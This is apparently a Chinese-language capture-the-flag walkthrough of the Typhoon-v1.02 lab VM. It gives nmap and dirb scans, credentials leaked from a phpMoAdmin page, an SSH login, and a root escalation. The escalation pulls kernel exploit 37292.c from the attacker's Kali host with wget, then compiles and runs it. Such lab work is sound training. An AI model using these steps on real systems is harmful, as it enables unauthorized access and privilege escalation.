Typhoon-v1.02靶机
环境:下载靶机、解压、VMware打开,并将其和kali虚拟机的网络调成NAT模式
一.明确目标
探测目标主机IP情况
nmap 192.168.153.0/24
目标主机IP:192.168.153.138
Kali的IP:192.168.153.129
二.信息搜集
Nmap 进行常规端口开放扫描
进行namp全端口服务枚举
nmap 192.168.153.138 -p- -A
可以看到开放了非常多的端口
nmap输出显示各种开放端口:21(ftp,可以匿名访问的)、22(ssh)、25(smtp)、53(domain)、80(http)、110(pop3)、111(rpcbind)、139(netbios-ssn)、 143(imap)、445(netbios-ssn)、631(ipp)、993(ssl/imaps)、995(ssl/pop3)、2049(nfs_acl)、3306(mysql)、5432(postgrespl)、8080(http) 、6379(redis)、27017(mongodb)
对该网站目录进行爆破枚举,利用到的是kali上的dirb:
dirb http://192.168.153.138
http://192.168.153.138/cms/
http://192.168.153.138/drupal/
http://192.168.153.138/phpmyadmin/
http://192.168.153.138/javascript/
http://192.168.153.138/robots.txt
通过dirb对目标网站进行扫描发现存在phpmyadmin以及robots.txt和drupal,cms等目录文件
登录http://192.168.153.138/robots.txt网站发现了/mongoadmin/目录文件
输入到url中:http://192.168.153.138/mongoadmin
(phpMoAdmin 是一个用PHP 开发的在线MongoDB 管理工具,可用于创建、删除和修改数据库和索引,提供视图和数据搜索工具,提供数据库启动时间和内存的统计,支持JSON 格式数据的导入导出。)
在界面多点击几次后等待会出现creds选项:
发现了:
[username] => typhoon
[password] => 789456123
再尝试一下ssh登录,成功登录。
ssh typhoon@192.168.153.138
查看有没有敏感文件或者敏感信息
发现没有什么可以利用的!!!!
三.近一步权限提升
于是考虑内核是否存在漏洞
uname -a
发现Linux 3.13.0版本
在Kali中查找查找漏洞
searchsploit 3.13.0
下载37292.c脚本来利用
searchsploit -m 37292.c
进入到/usr/share/exploitdb/exploits/linux/local下,将37292.c复制到root家目录下
cp 37292.c /root
打开Kali网站服务
在靶机中使用wget从Kali上下载37292.c脚本(首先靶机进入/tmp目录下)
wget http://192.168.153.129:8000/37292.c
使用gcc命令对.c脚本进行编译并重命名为exp
gcc 37292.c -o exp
再给exp文件所有权限,之后再运行exp文件
chmod +777 exp
./exp
成功获取Root权限!!!!!!!!!!!!!!!
四.总结
1)信息收集
1、nmap信息挖掘。2、挖掘HTTP服务信息。3、搜寻页面有用的信息。
2)根据网页信息提示尝试ssh远程登录
3)提权:
1、内核提权
([注:此靶机有很多种漏洞,例如nmap全端口信息枚举、drupal漏洞利用、SSH端口爆破、phpMoAdmin利用、LotusCMS漏洞利用、Tomca漏洞利用、Shellshock漏洞利用、NSF漏洞利用、5432 PostgreSQL漏洞利用、Samba远程代码执行漏洞(CVE-2017-7494)Linux版永恒之蓝 445端口(139端口)、25端口DNS漏洞利用-区域攻击等等)